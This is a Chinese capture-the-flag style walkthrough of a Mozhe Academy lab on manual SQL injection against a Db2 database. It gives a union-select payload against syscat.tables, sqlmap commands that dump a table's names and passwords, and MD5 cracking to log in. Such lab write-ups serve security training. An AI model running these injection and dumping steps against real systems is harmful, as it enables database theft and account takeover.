【墨者学院】“SQL手工注入漏洞测试(Db2数据库)”详细通关

废话不多说直接开始

 目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Db2的数据结构;
4.了解字符串的MD5加解密;

第一步

进入SQL手工注入漏洞测试(Db2数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

启动环境

第二步

启动环境,寻找注入点

//寻找一通后发现登录框下方的通知处是另一个存在注入点的网页//

第三步

开始尝试注入测试

  • 单引号测试(发现异常)
  • 利用id=2-1进行测试(发现是数字型注入)
  • 利用 order by 进行测试列数(发现五列)
  • 开始联合查询(发现回显)
    id=-1 union select 1,2,3,4 from syscat.tables

第四步

因为手敲太麻烦,而且DB2数据库语法和SQL不一样,所以选择利用工具SQLmap工具进行爆库爆表爆数据

sqlmap -u "http://124.70.71.251:45418/new_list.php?id=1" --dbs --dump --threads 8 --batch

直接选择全部--dump 一波爆

因为数据库类型原因,所以在最后数据中并没有直接爆出账号和密码

利用上面数据开始爆

sqlmap -u "http://124.70.71.251:45418/new_list.php?id=1" -D "DB2INST1" -T "GAME_CHARACTER" -C "name","password" --threads 8 --batch --dump

最后一步

利用md5进行解密密码(MD5免费在线解密破解_MD5在线加密-SOMD5

利用得到的用户名和密码尝试登录

解题结束!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值